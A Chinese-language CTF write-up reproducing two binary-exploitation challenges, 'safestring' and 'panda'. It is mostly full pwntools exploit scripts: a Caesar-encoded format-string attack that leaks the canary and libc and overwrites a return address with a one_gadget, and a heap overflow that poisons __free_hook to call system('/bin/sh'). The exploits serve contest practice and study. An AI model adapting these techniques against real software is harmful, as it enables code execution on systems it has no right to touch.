熊猫杯-PWN题复现

safestring

一个格式化字符串的利用，但是不能需要先进行加密再进行传输，其实也就是一个凯撒加密，逆向出来的解密函数如下

def decode_s(data):
    result = bytearray()
    data=bytearray(data)

    for byte in data:
        if 32 <= byte <= 126:  # 可见字符范围
            if 65 <= byte <= 90:  # 大写字母 A-Z
                base = 65
            elif 97 <= byte <= 122:  # 小写字母 a-z
                base = 97
            else:
                result.append(byte)
                continue  
            # 凯撒密码解密，向前移动23个位置
            decrypted = (byte - base + 23) % 26 + base
            result.append(decrypted)
        else:
            result.append(byte)
    
    return bytes(result)

然后格式化字符串任意地址泄露加任意地址写返回地址为ogg即可

# -*- coding=utf-8 -*-
#!/usr/bin/env python3
# A script for pwn exp
from pwn import *
import os
import sys

context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']

LOCAL = 0
LIBC = 1
REMOTE = 0
elf_path = './main'
libc_path = 'libc-2.31.so'
code = ELF(elf_path)
context.arch=code.arch


r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
uu32    = lambda: u32(io.recvuntil("\xf7")[-4:].ljust(4, b"\x00"))
uu64    = lambda:u64(io.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
lg      = lambda s:io.success('\033[32m%s -> 0x%x\033[0m' % (s, eval(s)))
li = lambda x: log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

if len(sys.argv) == 1:
    print ("Welcome to  c0ke's simplified pwntools template!!!")
    print ("Usage : \n")
    print ("       python mode.py HOST PORT\n ")
    print ("       python mode.py [0/1][debug]]\n ")
    exit()
elif len(sys.argv)==2:
    context.log_level = 'debug'
    if(sys.argv[1]== '1'):
        LOCAL = 1
    else:
        LOCAL = 0
else:
    REMOTE = 1
    server_ip = sys.argv[1]
    server_port = int(sys.argv[2])



# --------------------------func-----------------------------
def db():
    if (LOCAL):
        gdb.attach(io,'''
        b main
        finish
        finish
        finish
        finish
        finish
        ''')

def find_libc(func_name,func_ad):
    p(func_name,func_ad)
    global libc 
    libc = LibcSearcher(func_name,func_ad)
    libcbase=func_ad-libc.dump(func_name)
    li('libcbase',libcbase)
    return libcbase

def cat_flag():
    flag_header = b'flag{'
    sleep(1)
    sl('cat flag')
    ru(flag_header)
    flag = flag_header + ru('}') + b'}'
    exit(0)



def decode_s(data):
    result = bytearray()
    data=bytearray(data)

    for byte in data:
        if 32 <= byte <= 126:  # 可见字符范围
            if 65 <= byte <= 90:  # 大写字母 A-Z
                base = 65
            elif 97 <= byte <= 122:  # 小写字母 a-z
                base = 97
            else:
                result.append(byte)
                continue  
            # 凯撒密码解密，向前移动23个位置
            decrypted = (byte - base + 23) % 26 + base
            result.append(decrypted)
        else:
            result.append(byte)
    
    return bytes(result)

# --------------------------exploit--------------------------
def exploit():
    li('exploit...')
    pl = b"%8$p.%9$p.%19$p.%17$p."
    pl = decode_s(pl)
    sla(">>","1")
    sla("input text:",pl)
    sla(">>","3")
    ru("text result: ")
    stack = int(ru("."),16)  
    base = int(ru("."),16)  - 0x1616
    libcbase = int(ru("."),16) - libc.symbols["__libc_start_main"]-243
    canry = int(ru("."),16)
    li("stack-ebp ------------------> 0x%x"%stack)
    li("canry ------------------> 0x%x"%canry)
    li("base ------------------> 0x%x"%base)
    li("libcbase ------------------> 0x%x"%libcbase)


    ogg = [0xe3b01,0xe3b04]
    offset= 14
    stack_ret = stack+8
    ogg_libc = ogg[1]+libcbase
    li("ogg_libc ------------------> 0x%x"%ogg_libc)
    li("stack_ret -----------------> 0x%x"%stack_ret)
    db()
    


    
    target= [((ogg_libc)&0xFFFF),((ogg_libc>>16)&0xFFFF)]
    li("ogg_first -------------> 0x%x"%target[0])
    li("ogg_second -------------> 0x%x"%target[1])
    pad =  b'%' + str(target[0]).encode() + b'c' + b'%' + str(offset).encode() + b'$hn'
    pad = pad.ljust(0x10,b"a") +p64(stack_ret) 
    sla(">>","1")
    sla("input text:",decode_s(pad))
    sla(">>","3")

    pad =  b'%' + str(target[1]).encode() + b'c' + b'%' + str(offset).encode() + b'$hn'
    pad = pad.ljust(0x10,b"a") +p64(stack_ret+0x2) 
    sla(">>","1")
    sla("input text:",decode_s(pad))
    sla(">>","3")


    
    ru("text result: ")
    sla(">>","4")




def finish():
    ia()
    c()


# --------------------------main-----------------------------
if __name__ == '__main__':
    if REMOTE:
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)
        elf = ELF(elf_path)
    else:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
            io = elf.process()
        else:
            io = elf.process()

    exploit()
    finish()

但是这个题有个很难受的点就是，不给libc,于是在文件里面搜索字符串“GCC",看看是什么版本，然后一个个版本试出来

例如，这个题的版本如下

1 2	coke@coke:~/桌面/string$ strings main \| grep GCC GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0

于是去找20.04对应的libc应该为2.31,然后2.31的每个版本试一下就可以了，不算太复杂

panda

直接释放再申请就可以获得libc地址，随后看起来有两个地方有问题：

delete时最后一个chunk会被复制
size填写为负数时存在堆溢出

第一种由于在delete时还会进行count检查，因此利用堆溢出打__free_hook即可。

from pwn import *

filename = './main'
context.arch='amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
local = 1
all_logs = []
elf = ELF(filename)
libc = elf.libc

if local:
    sh = process(filename)
else:
    sh = remote('173.30.16.227', 9999)

def debug(params=''):
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid, params)

choice_words = 'Enter your choice: '

menu_del = 4
del_index_words = 'Enter panda id to delete: '

menu_show = 3
show_index_words = ''

def add(size, name, content):
    sh.sendlineafter(choice_words, '1')
    sh.sendlineafter('Enter size: ', str(size))
    sh.sendafter('Enter panda name: ', name)
    sh.sendafter('Enter panda content: ', content)
    

def delete(index=-1):
    sh.sendlineafter(choice_words, str(menu_del))
    if del_index_words:
        sh.sendlineafter(del_index_words, str(index))

def show(index=-1):
    sh.sendlineafter(choice_words, str(menu_show))
    if show_index_words:
        sh.sendlineafter(show_index_words, str(index))

def edit(index, name, content):
    sh.sendlineafter(choice_words, '2')
    sh.sendlineafter('Enter panda id to edit: ', str(index))
    sh.sendlineafter('Enter panda name: ', name)
    sh.sendafter('Enter panda content: ', content)

def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)

add(size=0x500, name=b'aaa', content=b'content') #0
add(size=0x80, name='name', content='content') #1

delete(index=0)
debug("b *$rebase(0x00000000000192B)")
add(size=0x500, name=b'a', content=b'z')
debug("b *$rebase(0x01656)")
show()
sh.recvuntil('Name: ')
sh.recvuntil('Name: ')
libc_leak = u64(sh.recv(6).ljust(8, b'\x00'))
leak_info('libc_leak', libc_leak)
libc.address = libc_leak - 0x1ecb61
leak_info('libc.address', libc.address)

add(size=-0x10, name=b'aaa', content=b'a'*0x10) #2
add(size=0x10, name=b'aaa', content='bbb') #3
add(size=0x10, name=b'aaa', content='bbb') #4
add(size=0x10, name=b'aaa', content='bbb') #5
add(size=0x10, name=b'aaa', content='bbb') #6

delete(index=4)
delete(index=3)
add(size=0x50, name=b'aaa', content='bbb')

payload = p64(0)*3 + p64(0x41) + p64(libc.sym['__free_hook'])
edit(index=2, name=b'a', content=payload)
add(size=0x10, name='/bin/sh\x00', content=b'a')
add(size=0x10, name=p64(libc.sym['system']), content=b'a')

delete(index=6)
sh.interactive()